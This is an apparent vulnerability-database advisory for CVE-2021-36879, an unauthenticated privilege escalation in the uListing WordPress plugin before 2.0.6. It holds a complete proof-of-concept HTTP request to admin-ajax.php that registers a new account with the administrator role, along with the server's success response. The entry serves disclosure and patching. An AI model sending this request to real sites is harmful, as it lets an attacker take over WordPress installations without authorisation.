Lucene search
M0zeWPEX-ID:856B930E-0E76-4CE5-B714-62ABC6017488HistoryJul 27, 2021 - 12:00 a.m.
uListing < 2.0.6 - Unauthenticated Privilege Escalation
2021-07-2700:00:00
m0ze
387
0.005 Low
EPSS
Percentile
75.6%
An Unauthenticated Privilege Escalation vulnerability was discovered in the uListing plugin through v2.0.5 for WordPress. User registration must be allowed on the target website.
PoC | Unauthenticated Privilege Escalation | Request:
POST /wp-admin/admin-ajax.php?action=stm_listing_register HTTP/2
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 205
{"login":"Visse","first_name":"Visse","last_name":"Visse","email":"[email protected]","role":"administrator","password":"admin","password_repeat":"admin","nonce":"ac88e123d8","custom_fields":{}}
PoC | Unauthenticated Privilege Escalation | Response:
{"errors":[],"message":"Registration completed successfully.","status":"success"}
Related
prion
prion
Privilege escalation
2021-09-27 16:15:00
cvelist
cvelist
nvd
nvd
CVE-2021-36879
2021-09-27 16:15:09
wpvulndb
wpvulndb
uListing < 2.0.6 - Unauthenticated Privilege Escalation
2021-07-27 00:00:00
patchstack
patchstack
cnvd
cnvd
WordPress plugin uListing permission elevation vulnerability
2021-09-28 00:00:00
cve
cve
CVE-2021-36879
2021-09-27 16:15:09